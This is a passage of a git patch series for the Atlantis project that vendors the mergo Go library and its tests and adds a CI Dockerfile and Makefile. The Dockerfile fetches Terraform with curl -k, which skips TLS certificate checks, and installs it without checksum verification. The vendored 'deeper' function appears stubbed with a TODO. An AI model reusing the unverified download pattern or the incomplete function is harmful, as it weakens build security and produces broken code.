+func isEmptyValue(v reflect.Value) bool { + switch v.Kind() { + case reflect.Array, reflect.Map, reflect.Slice, reflect.String: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Interface, reflect.Ptr: + if v.IsNil() { + return true + } + return isEmptyValue(v.Elem()) + case reflect.Func: + return v.IsNil() + case reflect.Invalid: + return true + } + return false +} + +func resolveValues(dst, src interface{}) (vDst, vSrc reflect.Value, err error) { + if dst == nil || src == nil { + err = ErrNilArguments + return + } + vDst = reflect.ValueOf(dst).Elem() + if vDst.Kind() != reflect.Struct && vDst.Kind() != reflect.Map { + err = ErrNotSupported + return + } + vSrc = reflect.ValueOf(src) + // We check if vSrc is a pointer to dereference it. + if vSrc.Kind() == reflect.Ptr { + vSrc = vSrc.Elem() + } + return +} + +// Traverses recursively both values, assigning src's fields values to dst. +// The map argument tracks comparisons that have already been seen, which allows +// short circuiting on recursive types. +func deeper(dst, src reflect.Value, visited map[uintptr]*visit, depth int) (err error) { + if dst.CanAddr() { + addr := dst.UnsafeAddr() + h := 17 * addr + seen := visited[h] + typ := dst.Type() + for p := seen; p != nil; p = p.next { + if p.ptr == addr && p.typ == typ { + return nil + } + } + // Remember, remember... 
+ visited[h] = &visit{addr, typ, seen} + } + return // TODO refactor +} diff --git a/vendor/github.com/imdario/mergo/mergo_test.go b/vendor/github.com/imdario/mergo/mergo_test.go new file mode 100644 index 0000000000..d777538431 --- /dev/null +++ b/vendor/github.com/imdario/mergo/mergo_test.go @@ -0,0 +1,733 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package mergo + +import ( + "io/ioutil" + "reflect" + "testing" + "time" + + "gopkg.in/yaml.v2" +) + +type simpleTest struct { + Value int +} + +type complexTest struct { + St simpleTest + sz int + ID string +} + +type mapTest struct { + M map[int]int +} + +type ifcTest struct { + I interface{} +} + +type moreComplextText struct { + Ct complexTest + St simpleTest + Nt simpleTest +} + +type pointerTest struct { + C *simpleTest +} + +type sliceTest struct { + S []int +} + +func TestKb(t *testing.T) { + type testStruct struct { + Name string + KeyValue map[string]interface{} + } + + akv := make(map[string]interface{}) + akv["Key1"] = "not value 1" + akv["Key2"] = "value2" + a := testStruct{} + a.Name = "A" + a.KeyValue = akv + + bkv := make(map[string]interface{}) + bkv["Key1"] = "value1" + bkv["Key3"] = "value3" + b := testStruct{} + b.Name = "B" + b.KeyValue = bkv + + ekv := make(map[string]interface{}) + ekv["Key1"] = "value1" + ekv["Key2"] = "value2" + ekv["Key3"] = "value3" + expected := testStruct{} + expected.Name = "B" + expected.KeyValue = ekv + + Merge(&b, a) + + if !reflect.DeepEqual(b, expected) { + t.Errorf("Actual: %#v did not match \nExpected: %#v", b, expected) + } +} + +func TestNil(t *testing.T) { + if err := Merge(nil, nil); err != ErrNilArguments { + t.Fail() + } +} + +func TestDifferentTypes(t *testing.T) { + a := simpleTest{42} + b := 42 + if err := Merge(&a, b); err != ErrDifferentArgumentsTypes { + t.Fail() + } +} + +func 
TestSimpleStruct(t *testing.T) { + a := simpleTest{} + b := simpleTest{42} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.Value != 42 { + t.Fatalf("b not merged in properly: a.Value(%d) != b.Value(%d)", a.Value, b.Value) + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestComplexStruct(t *testing.T) { + a := complexTest{} + a.ID = "athing" + b := complexTest{simpleTest{42}, 1, "bthing"} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.St.Value != 42 { + t.Fatalf("b not merged in properly: a.St.Value(%d) != b.St.Value(%d)", a.St.Value, b.St.Value) + } + if a.sz == 1 { + t.Fatalf("a's private field sz not preserved from merge: a.sz(%d) == b.sz(%d)", a.sz, b.sz) + } + if a.ID == b.ID { + t.Fatalf("a's field ID merged unexpectedly: a.ID(%s) == b.ID(%s)", a.ID, b.ID) + } +} + +func TestComplexStructWithOverwrite(t *testing.T) { + a := complexTest{simpleTest{1}, 1, "do-not-overwrite-with-empty-value"} + b := complexTest{simpleTest{42}, 2, ""} + + expect := complexTest{simpleTest{42}, 1, "do-not-overwrite-with-empty-value"} + if err := MergeWithOverwrite(&a, b); err != nil { + t.FailNow() + } + + if !reflect.DeepEqual(a, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", a, expect) + } +} + +func TestPointerStruct(t *testing.T) { + s1 := simpleTest{} + s2 := simpleTest{19} + a := pointerTest{&s1} + b := pointerTest{&s2} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.C.Value != b.C.Value { + t.Fatalf("b not merged in properly: a.C.Value(%d) != b.C.Value(%d)", a.C.Value, b.C.Value) + } +} + +type embeddingStruct struct { + embeddedStruct +} + +type embeddedStruct struct { + A string +} + +func TestEmbeddedStruct(t *testing.T) { + tests := []struct { + src embeddingStruct + dst embeddingStruct + expected embeddingStruct + }{ + { + src: embeddingStruct{ + embeddedStruct{"foo"}, + }, + dst: embeddingStruct{ + embeddedStruct{""}, + }, + expected: embeddingStruct{ + embeddedStruct{"foo"}, + }, + 
}, + { + src: embeddingStruct{ + embeddedStruct{""}, + }, + dst: embeddingStruct{ + embeddedStruct{"bar"}, + }, + expected: embeddingStruct{ + embeddedStruct{"bar"}, + }, + }, + { + src: embeddingStruct{ + embeddedStruct{"foo"}, + }, + dst: embeddingStruct{ + embeddedStruct{"bar"}, + }, + expected: embeddingStruct{ + embeddedStruct{"bar"}, + }, + }, + } + + for _, test := range tests { + err := Merge(&test.dst, test.src) + if err != nil { + t.Errorf("unexpected error: %v", err) + continue + } + if !reflect.DeepEqual(test.dst, test.expected) { + t.Errorf("unexpected output\nexpected:\n%+v\nsaw:\n%+v\n", test.expected, test.dst) + } + } +} + +func TestPointerStructNil(t *testing.T) { + a := pointerTest{nil} + b := pointerTest{&simpleTest{19}} + if err := Merge(&a, b); err != nil { + t.FailNow() + } + if a.C.Value != b.C.Value { + t.Fatalf("b not merged in a properly: a.C.Value(%d) != b.C.Value(%d)", a.C.Value, b.C.Value) + } +} + +func testSlice(t *testing.T, a []int, b []int, e []int, opts ...func(*Config)) { + t.Helper() + bc := b + + sa := sliceTest{a} + sb := sliceTest{b} + if err := Merge(&sa, sb, opts...); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(sb.S, bc) { + t.Fatalf("Source slice was modified %d != %d", sb.S, bc) + } + if !reflect.DeepEqual(sa.S, e) { + t.Fatalf("b not merged in a proper way %d != %d", sa.S, e) + } + + ma := map[string][]int{"S": a} + mb := map[string][]int{"S": b} + if err := Merge(&ma, mb, opts...); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(mb["S"], bc) { + t.Fatalf("map value: Source slice was modified %d != %d", mb["S"], bc) + } + if !reflect.DeepEqual(ma["S"], e) { + t.Fatalf("map value: b not merged in a proper way %d != %d", ma["S"], e) + } + + if a == nil { + // test case with missing dst key + ma := map[string][]int{} + mb := map[string][]int{"S": b} + if err := Merge(&ma, mb); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(mb["S"], bc) { + t.Fatalf("missing dst key: Source slice was modified %d != 
%d", mb["S"], bc) + } + if !reflect.DeepEqual(ma["S"], e) { + t.Fatalf("missing dst key: b not merged in a proper way %d != %d", ma["S"], e) + } + } + + if b == nil { + // test case with missing src key + ma := map[string][]int{"S": a} + mb := map[string][]int{} + if err := Merge(&ma, mb); err != nil { + t.FailNow() + } + if !reflect.DeepEqual(mb["S"], bc) { + t.Fatalf("missing src key: Source slice was modified %d != %d", mb["S"], bc) + } + if !reflect.DeepEqual(ma["S"], e) { + t.Fatalf("missing src key: b not merged in a proper way %d != %d", ma["S"], e) + } + } +} + +func TestSlice(t *testing.T) { + testSlice(t, nil, []int{1, 2, 3}, []int{1, 2, 3}) + testSlice(t, []int{}, []int{1, 2, 3}, []int{1, 2, 3}) + testSlice(t, []int{1}, []int{2, 3}, []int{1}) + testSlice(t, []int{1}, []int{}, []int{1}) + testSlice(t, []int{1}, nil, []int{1}) + testSlice(t, nil, []int{1, 2, 3}, []int{1, 2, 3}, WithAppendSlice) + testSlice(t, []int{}, []int{1, 2, 3}, []int{1, 2, 3}, WithAppendSlice) + testSlice(t, []int{1}, []int{2, 3}, []int{1, 2, 3}, WithAppendSlice) + testSlice(t, []int{1}, []int{}, []int{1}, WithAppendSlice) + testSlice(t, []int{1}, nil, []int{1}, WithAppendSlice) +} + +func TestEmptyMaps(t *testing.T) { + a := mapTest{} + b := mapTest{ + map[int]int{}, + } + if err := Merge(&a, b); err != nil { + t.Fail() + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestEmptyToEmptyMaps(t *testing.T) { + a := mapTest{} + b := mapTest{} + if err := Merge(&a, b); err != nil { + t.Fail() + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestEmptyToNotEmptyMaps(t *testing.T) { + a := mapTest{map[int]int{ + 1: 2, + 3: 4, + }} + aa := mapTest{map[int]int{ + 1: 2, + 3: 4, + }} + b := mapTest{ + map[int]int{}, + } + if err := Merge(&a, b); err != nil { + t.Fail() + } + if !reflect.DeepEqual(a, aa) { + t.FailNow() + } +} + +func TestMapsWithOverwrite(t *testing.T) { + m := map[string]simpleTest{ + "a": {}, // overwritten by 16 + "b": {42}, // not overwritten 
by empty value + "c": {13}, // overwritten by 12 + "d": {61}, + } + n := map[string]simpleTest{ + "a": {16}, + "b": {}, + "c": {12}, + "e": {14}, + } + expect := map[string]simpleTest{ + "a": {16}, + "b": {}, + "c": {12}, + "d": {61}, + "e": {14}, + } + + if err := MergeWithOverwrite(&m, n); err != nil { + t.Fatalf(err.Error()) + } + + if !reflect.DeepEqual(m, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", m, expect) + } +} + +func TestMaps(t *testing.T) { + m := map[string]simpleTest{ + "a": {}, + "b": {42}, + "c": {13}, + "d": {61}, + } + n := map[string]simpleTest{ + "a": {16}, + "b": {}, + "c": {12}, + "e": {14}, + } + expect := map[string]simpleTest{ + "a": {0}, + "b": {42}, + "c": {13}, + "d": {61}, + "e": {14}, + } + + if err := Merge(&m, n); err != nil { + t.Fatalf(err.Error()) + } + + if !reflect.DeepEqual(m, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", m, expect) + } + if m["a"].Value != 0 { + t.Fatalf(`n merged in m because I solved non-addressable map values TODO: m["a"].Value(%d) != n["a"].Value(%d)`, m["a"].Value, n["a"].Value) + } + if m["b"].Value != 42 { + t.Fatalf(`n wrongly merged in m: m["b"].Value(%d) != n["b"].Value(%d)`, m["b"].Value, n["b"].Value) + } + if m["c"].Value != 13 { + t.Fatalf(`n overwritten in m: m["c"].Value(%d) != n["c"].Value(%d)`, m["c"].Value, n["c"].Value) + } +} + +func TestMapsWithNilPointer(t *testing.T) { + m := map[string]*simpleTest{ + "a": nil, + "b": nil, + } + n := map[string]*simpleTest{ + "b": nil, + "c": nil, + } + expect := map[string]*simpleTest{ + "a": nil, + "b": nil, + "c": nil, + } + + if err := Merge(&m, n, WithOverride); err != nil { + t.Fatalf(err.Error()) + } + + if !reflect.DeepEqual(m, expect) { + t.Fatalf("Test failed:\ngot :\n%#v\n\nwant :\n%#v\n\n", m, expect) + } +} + +func TestYAMLMaps(t *testing.T) { + thing := loadYAML("testdata/thing.yml") + license := loadYAML("testdata/license.yml") + ft := thing["fields"].(map[interface{}]interface{}) + fl := 
license["fields"].(map[interface{}]interface{}) + // license has one extra field (site) and another already existing in thing (author) that Mergo won't override. + expectedLength := len(ft) + len(fl) - 1 + if err := Merge(&license, thing); err != nil { + t.Fatal(err.Error()) + } + currentLength := len(license["fields"].(map[interface{}]interface{})) + if currentLength != expectedLength { + t.Fatalf(`thing not merged in license properly, license must have %d elements instead of %d`, expectedLength, currentLength) + } + fields := license["fields"].(map[interface{}]interface{}) + if _, ok := fields["id"]; !ok { + t.Fatalf(`thing not merged in license properly, license must have a new id field from thing`) + } +} + +func TestTwoPointerValues(t *testing.T) { + a := &simpleTest{} + b := &simpleTest{42} + if err := Merge(a, b); err != nil { + t.Fatalf(`Boom. You crossed the streams: %s`, err) + } +} + +func TestMap(t *testing.T) { + a := complexTest{} + a.ID = "athing" + c := moreComplextText{a, simpleTest{}, simpleTest{}} + b := map[string]interface{}{ + "ct": map[string]interface{}{ + "st": map[string]interface{}{ + "value": 42, + }, + "sz": 1, + "id": "bthing", + }, + "st": &simpleTest{144}, // Mapping a reference + "zt": simpleTest{299}, // Mapping a missing field (zt doesn't exist) + "nt": simpleTest{3}, + } + if err := Map(&c, b); err != nil { + t.FailNow() + } + m := b["ct"].(map[string]interface{}) + n := m["st"].(map[string]interface{}) + o := b["st"].(*simpleTest) + p := b["nt"].(simpleTest) + if c.Ct.St.Value != 42 { + t.Fatalf("b not merged in properly: c.Ct.St.Value(%d) != b.Ct.St.Value(%d)", c.Ct.St.Value, n["value"]) + } + if c.St.Value != 144 { + t.Fatalf("b not merged in properly: c.St.Value(%d) != b.St.Value(%d)", c.St.Value, o.Value) + } + if c.Nt.Value != 3 { + t.Fatalf("b not merged in properly: c.Nt.Value(%d) != b.Nt.Value(%d)", c.St.Value, p.Value) + } + if c.Ct.sz == 1 { + t.Fatalf("a's private field sz not preserved from merge: c.Ct.sz(%d) == 
b.Ct.sz(%d)", c.Ct.sz, m["sz"]) + } + if c.Ct.ID == m["id"] { + t.Fatalf("a's field ID merged unexpectedly: c.Ct.ID(%s) == b.Ct.ID(%s)", c.Ct.ID, m["id"]) + } +} + +func TestSimpleMap(t *testing.T) { + a := simpleTest{} + b := map[string]interface{}{ + "value": 42, + } + if err := Map(&a, b); err != nil { + t.FailNow() + } + if a.Value != 42 { + t.Fatalf("b not merged in properly: a.Value(%d) != b.Value(%v)", a.Value, b["value"]) + } +} + +func TestIfcMap(t *testing.T) { + a := ifcTest{} + b := ifcTest{42} + if err := Map(&a, b); err != nil { + t.FailNow() + } + if a.I != 42 { + t.Fatalf("b not merged in properly: a.I(%d) != b.I(%d)", a.I, b.I) + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +func TestIfcMapNoOverwrite(t *testing.T) { + a := ifcTest{13} + b := ifcTest{42} + if err := Map(&a, b); err != nil { + t.FailNow() + } + if a.I != 13 { + t.Fatalf("a not left alone: a.I(%d) == b.I(%d)", a.I, b.I) + } +} + +func TestIfcMapWithOverwrite(t *testing.T) { + a := ifcTest{13} + b := ifcTest{42} + if err := MapWithOverwrite(&a, b); err != nil { + t.FailNow() + } + if a.I != 42 { + t.Fatalf("b not merged in properly: a.I(%d) != b.I(%d)", a.I, b.I) + } + if !reflect.DeepEqual(a, b) { + t.FailNow() + } +} + +type pointerMapTest struct { + A int + hidden int + B *simpleTest +} + +func TestBackAndForth(t *testing.T) { + pt := pointerMapTest{42, 1, &simpleTest{66}} + m := make(map[string]interface{}) + if err := Map(&m, pt); err != nil { + t.FailNow() + } + var ( + v interface{} + ok bool + ) + if v, ok = m["a"]; v.(int) != pt.A || !ok { + t.Fatalf("pt not merged in properly: m[`a`](%d) != pt.A(%d)", v, pt.A) + } + if v, ok = m["b"]; !ok { + t.Fatalf("pt not merged in properly: B is missing in m") + } + var st *simpleTest + if st = v.(*simpleTest); st.Value != 66 { + t.Fatalf("something went wrong while mapping pt on m, B wasn't copied") + } + bpt := pointerMapTest{} + if err := Map(&bpt, m); err != nil { + t.Fatal(err) + } + if bpt.A != pt.A { + t.Fatalf("pt 
not merged in properly: bpt.A(%d) != pt.A(%d)", bpt.A, pt.A) + } + if bpt.hidden == pt.hidden { + t.Fatalf("pt unexpectedly merged: bpt.hidden(%d) == pt.hidden(%d)", bpt.hidden, pt.hidden) + } + if bpt.B.Value != pt.B.Value { + t.Fatalf("pt not merged in properly: bpt.B.Value(%d) != pt.B.Value(%d)", bpt.B.Value, pt.B.Value) + } +} + +func TestEmbeddedPointerUnpacking(t *testing.T) { + tests := []struct{ input pointerMapTest }{ + {pointerMapTest{42, 1, nil}}, + {pointerMapTest{42, 1, &simpleTest{66}}}, + } + newValue := 77 + m := map[string]interface{}{ + "b": map[string]interface{}{ + "value": newValue, + }, + } + for _, test := range tests { + pt := test.input + if err := MapWithOverwrite(&pt, m); err != nil { + t.FailNow() + } + if pt.B.Value != newValue { + t.Fatalf("pt not mapped properly: pt.A.Value(%d) != m[`b`][`value`](%d)", pt.B.Value, newValue) + } + + } +} + +type structWithTimePointer struct { + Birth *time.Time +} + +func TestTime(t *testing.T) { + now := time.Now() + dataStruct := structWithTimePointer{ + Birth: &now, + } + dataMap := map[string]interface{}{ + "Birth": &now, + } + b := structWithTimePointer{} + if err := Merge(&b, dataStruct); err != nil { + t.FailNow() + } + if b.Birth.IsZero() { + t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataStruct['Birth'](%v)", b.Birth, dataStruct.Birth) + } + if b.Birth != dataStruct.Birth { + t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataStruct['Birth'](%v)", b.Birth, dataStruct.Birth) + } + b = structWithTimePointer{} + if err := Map(&b, dataMap); err != nil { + t.FailNow() + } + if b.Birth.IsZero() { + t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataMap['Birth'](%v)", b.Birth, dataMap["Birth"]) + } +} + +type simpleNested struct { + A int +} + +type structWithNestedPtrValueMap struct { + NestedPtrValue map[string]*simpleNested +} + +func TestNestedPtrValueInMap(t *testing.T) { + src := &structWithNestedPtrValueMap{ + NestedPtrValue: map[string]*simpleNested{ + 
"x": { + A: 1, + }, + }, + } + dst := &structWithNestedPtrValueMap{ + NestedPtrValue: map[string]*simpleNested{ + "x": {}, + }, + } + if err := Map(dst, src); err != nil { + t.FailNow() + } + if dst.NestedPtrValue["x"].A == 0 { + t.Fatalf("Nested Ptr value not merged in properly: dst.NestedPtrValue[\"x\"].A(%v) != src.NestedPtrValue[\"x\"].A(%v)", dst.NestedPtrValue["x"].A, src.NestedPtrValue["x"].A) + } +} + +func loadYAML(path string) (m map[string]interface{}) { + m = make(map[string]interface{}) + raw, _ := ioutil.ReadFile(path) + _ = yaml.Unmarshal(raw, &m) + return +} + +type structWithMap struct { + m map[string]structWithUnexportedProperty +} + +type structWithUnexportedProperty struct { + s string +} + +func TestUnexportedProperty(t *testing.T) { + a := structWithMap{map[string]structWithUnexportedProperty{ + "key": {"hello"}, + }} + b := structWithMap{map[string]structWithUnexportedProperty{ + "key": {"hi"}, + }} + defer func() { + if r := recover(); r != nil { + t.Errorf("Should not have panicked") + } + }() + Merge(&a, b) +} + +type structWithBoolPointer struct { + C *bool +} + +func TestBooleanPointer(t *testing.T) { + bt, bf := true, false + src := structWithBoolPointer{ + &bt, + } + dst := structWithBoolPointer{ + &bf, + } + if err := Merge(&dst, src); err != nil { + t.FailNow() + } + if dst.C == src.C { + t.Fatalf("dst.C should be a different pointer than src.C") + } + if *dst.C != *src.C { + t.Fatalf("dst.C should be true") + } +} diff --git a/vendor/github.com/imdario/mergo/pr80_test.go b/vendor/github.com/imdario/mergo/pr80_test.go new file mode 100644 index 0000000000..0b3220f3bc --- /dev/null +++ b/vendor/github.com/imdario/mergo/pr80_test.go @@ -0,0 +1,18 @@ +package mergo + +import ( + "testing" +) + +type mapInterface map[string]interface{} + +func TestMergeMapsEmptyString(t *testing.T) { + a := mapInterface{"s": ""} + b := mapInterface{"s": "foo"} + if err := Merge(&a, b); err != nil { + t.Fatal(err) + } + if a["s"] != "foo" { + t.Fatalf("b 
not merged in properly: a.s.Value(%s) != expected(%s)", a["s"], "foo") + } +} diff --git a/vendor/github.com/imdario/mergo/pr81_test.go b/vendor/github.com/imdario/mergo/pr81_test.go new file mode 100644 index 0000000000..e90e923feb --- /dev/null +++ b/vendor/github.com/imdario/mergo/pr81_test.go @@ -0,0 +1,42 @@ +package mergo + +import ( + "testing" +) + +func TestMapInterfaceWithMultipleLayer(t *testing.T) { + m1 := map[string]interface{}{ + "k1": map[string]interface{}{ + "k1.1": "v1", + }, + } + + m2 := map[string]interface{}{ + "k1": map[string]interface{}{ + "k1.1": "v2", + "k1.2": "v3", + }, + } + + if err := Map(&m1, m2, WithOverride); err != nil { + t.Fatalf("Error merging: %v", err) + } + + // Check overwrite of sub map works + expected := "v2" + actual := m1["k1"].(map[string]interface{})["k1.1"].(string) + if actual != expected { + t.Fatalf("Expected %v but got %v", + expected, + actual) + } + + // Check new key is merged + expected = "v3" + actual = m1["k1"].(map[string]interface{})["k1.2"].(string) + if actual != expected { + t.Fatalf("Expected %v but got %v", + expected, + actual) + } +} diff --git a/vendor/github.com/imdario/mergo/testdata/license.yml b/vendor/github.com/imdario/mergo/testdata/license.yml new file mode 100644 index 0000000000..2f1ad0082b --- /dev/null +++ b/vendor/github.com/imdario/mergo/testdata/license.yml @@ -0,0 +1,4 @@ +import: ../../../../fossene/db/schema/thing.yml +fields: + site: string + author: root diff --git a/vendor/github.com/imdario/mergo/testdata/thing.yml b/vendor/github.com/imdario/mergo/testdata/thing.yml new file mode 100644 index 0000000000..1a71041250 --- /dev/null +++ b/vendor/github.com/imdario/mergo/testdata/thing.yml @@ -0,0 +1,6 @@ +fields: + id: int + name: string + parent: ref "datu:thing" + status: enum(draft, public, private) + author: updater From 3c9188b2b84a7cc277cc49dda8dd8cb9f88cd9c7 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:09:02 +0100 Subject: [PATCH 32/69] Add unit 
test image --- .circleci/config.yml | 2 +- Gopkg.lock | 2 +- Gopkg.toml | 4 ++++ testing/Dockerfile | 12 ++++++++++++ testing/Makefile | 11 +++++++++++ 5 files changed, 29 insertions(+), 2 deletions(-) create mode 100644 testing/Dockerfile create mode 100644 testing/Makefile diff --git a/.circleci/config.yml b/.circleci/config.yml index a632082603..50fb04e89c 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -3,7 +3,7 @@ jobs: test: working_directory: /go/src/github.com/runatlantis/atlantis docker: - - image: circleci/golang:1.10 + - image: runatlantis/testing-env steps: - checkout - run: make test-coverage diff --git a/Gopkg.lock b/Gopkg.lock index dc144cf25f..08daf551c6 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -352,6 +352,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "148489fcbc8e0f37944adc0eb2f9f187995790c5107188e9f4bebb79f7989434" + inputs-digest = "41fa7bc4fc730240930807e113d19be175d2a8dfbca5cdf084e8285a3a150e43" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 749d2f189b..1d0d53b35e 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -96,3 +96,7 @@ [[constraint]] branch = "master" name = "github.com/flynn-archive/go-shlex" + +[[constraint]] + name = "github.com/docker/docker" + version = "1.13.1" diff --git a/testing/Dockerfile b/testing/Dockerfile new file mode 100644 index 0000000000..b52eb89868 --- /dev/null +++ b/testing/Dockerfile @@ -0,0 +1,12 @@ +# This Dockerfile builds the docker image used for running circle ci tests. +# We need terraform installed for our full test suite so it installs that. 
+# It's updated by running make build-testing-image +FROM circleci/golang:1.10 + +# Install Terraform +ENV TERRAFORM_VERSION=0.11.7 +RUN curl -LOks https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \ + sudo mkdir -p /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \ + sudo unzip terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \ + sudo ln -s /usr/local/bin/tf/versions/${TERRAFORM_VERSION}/terraform /usr/local/bin/terraform && \ + rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip diff --git a/testing/Makefile b/testing/Makefile new file mode 100644 index 0000000000..49a5387eca --- /dev/null +++ b/testing/Makefile @@ -0,0 +1,11 @@ +TEST_IMAGE_NAME := runatlantis/testing-env + +.DEFAULT_GOAL := help +help: ## List targets & descriptions + @cat Makefile* | grep -E '^[a-zA-Z_-]+:.*?## .*$$' | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}' + +build-testing-image: ## Build and push the testing image + docker build -t $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) . 
+ docker tag $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) $(TEST_IMAGE_NAME):latest + docker push $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) + docker push $(TEST_IMAGE_NAME):latest From 07ff6972ebc6c915c8761765b11da95832091665 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:35:41 +0100 Subject: [PATCH 33/69] Vendor docker --- Gopkg.lock | 18 +- Gopkg.toml | 2 +- vendor/github.com/docker/docker/.DEREK.yml | 17 + vendor/github.com/docker/docker/.dockerignore | 3 + .../docker/docker/.github/CODEOWNERS | 20 + .../docker/docker/.github/ISSUE_TEMPLATE.md | 12 +- .../docker/.github/PULL_REQUEST_TEMPLATE.md | 2 +- vendor/github.com/docker/docker/.gitignore | 19 +- vendor/github.com/docker/docker/.mailmap | 674 +- vendor/github.com/docker/docker/AUTHORS | 572 +- vendor/github.com/docker/docker/CHANGELOG.md | 290 +- .../github.com/docker/docker/CONTRIBUTING.md | 191 +- vendor/github.com/docker/docker/Dockerfile | 380 +- .../docker/docker/Dockerfile.aarch64 | 175 - .../github.com/docker/docker/Dockerfile.armhf | 182 - .../github.com/docker/docker/Dockerfile.e2e | 74 + .../docker/docker/Dockerfile.ppc64le | 188 - .../github.com/docker/docker/Dockerfile.s390x | 190 - .../docker/docker/Dockerfile.simple | 37 +- .../docker/docker/Dockerfile.solaris | 20 - .../docker/docker/Dockerfile.windows | 57 +- vendor/github.com/docker/docker/LICENSE | 2 +- vendor/github.com/docker/docker/MAINTAINERS | 176 +- vendor/github.com/docker/docker/Makefile | 124 +- vendor/github.com/docker/docker/NOTICE | 2 +- vendor/github.com/docker/docker/README.md | 309 +- vendor/github.com/docker/docker/ROADMAP.md | 122 +- vendor/github.com/docker/docker/TESTING.md | 71 + vendor/github.com/docker/docker/VENDORING.md | 11 +- vendor/github.com/docker/docker/VERSION | 1 - vendor/github.com/docker/docker/api/README.md | 16 +- vendor/github.com/docker/docker/api/common.go | 161 +- .../docker/docker/api/common_test.go | 341 - .../docker/docker/api/common_unix.go | 4 +- 
.../docker/docker/api/common_windows.go | 4 +- .../docker/docker/api/errors/errors.go | 47 - .../api/server/backend/build/backend.go | 136 + .../docker/api/server/backend/build/tag.go | 77 + .../docker/api/server/httputils/decoder.go | 2 +- .../docker/api/server/httputils/errors.go | 126 +- .../docker/api/server/httputils/form.go | 35 +- .../docker/api/server/httputils/form_test.go | 4 +- .../docker/api/server/httputils/httputils.go | 46 +- .../api/server/httputils/httputils_test.go | 18 + .../server/httputils/httputils_write_json.go | 4 +- .../httputils/httputils_write_json_go16.go | 16 - .../api/server/httputils/write_log_stream.go | 84 + .../docker/docker/api/server/middleware.go | 4 +- .../docker/api/server/middleware/cors.go | 6 +- .../docker/api/server/middleware/debug.go | 34 +- .../api/server/middleware/debug_test.go | 59 + .../api/server/middleware/experimental.go | 5 +- .../api/server/middleware/middleware.go | 5 +- .../docker/api/server/middleware/version.go | 35 +- .../api/server/middleware/version_test.go | 71 +- .../docker/docker/api/server/profiler.go | 41 - .../docker/api/server/router/build/backend.go | 22 +- .../docker/api/server/router/build/build.go | 13 +- .../api/server/router/build/build_routes.go | 307 +- .../api/server/router/checkpoint/backend.go | 2 +- .../server/router/checkpoint/checkpoint.go | 8 +- .../router/checkpoint/checkpoint_routes.go | 4 +- .../api/server/router/container/backend.go | 24 +- .../api/server/router/container/container.go | 19 +- .../router/container/container_routes.go | 207 +- .../api/server/router/container/copy.go | 65 +- .../api/server/router/container/exec.go | 23 +- .../api/server/router/container/inspect.go | 4 +- .../docker/api/server/router/debug/debug.go | 53 + .../api/server/router/debug/debug_routes.go | 12 + .../api/server/router/distribution/backend.go | 15 + .../router/distribution/distribution.go | 31 + .../distribution/distribution_routes.go | 138 + .../docker/api/server/router/experimental.go | 21 
+- .../docker/api/server/router/image/backend.go | 23 +- .../docker/api/server/router/image/image.go | 18 +- .../api/server/router/image/image_routes.go | 162 +- .../docker/docker/api/server/router/local.go | 44 +- .../api/server/router/network/backend.go | 20 +- .../api/server/router/network/filter.go | 49 +- .../api/server/router/network/filter_test.go | 149 + .../api/server/router/network/network.go | 17 +- .../server/router/network/network_routes.go | 353 +- .../api/server/router/plugin/backend.go | 12 +- .../docker/api/server/router/plugin/plugin.go | 8 +- .../api/server/router/plugin/plugin_routes.go | 68 +- .../docker/docker/api/server/router/router.go | 2 +- .../api/server/router/session/backend.go | 11 + .../api/server/router/session/session.go | 29 + .../server/router/session/session_routes.go | 16 + .../docker/api/server/router/swarm/backend.go | 30 +- .../docker/api/server/router/swarm/cluster.go | 15 +- .../api/server/router/swarm/cluster_routes.go | 206 +- .../docker/api/server/router/swarm/helpers.go | 66 + .../api/server/router/system/backend.go | 13 +- .../docker/api/server/router/system/system.go | 25 +- .../api/server/router/system/system_routes.go | 70 +- .../api/server/router/volume/backend.go | 15 +- .../docker/api/server/router/volume/volume.go | 4 +- .../api/server/router/volume/volume_routes.go | 34 +- .../docker/api/server/router_swapper.go | 2 +- 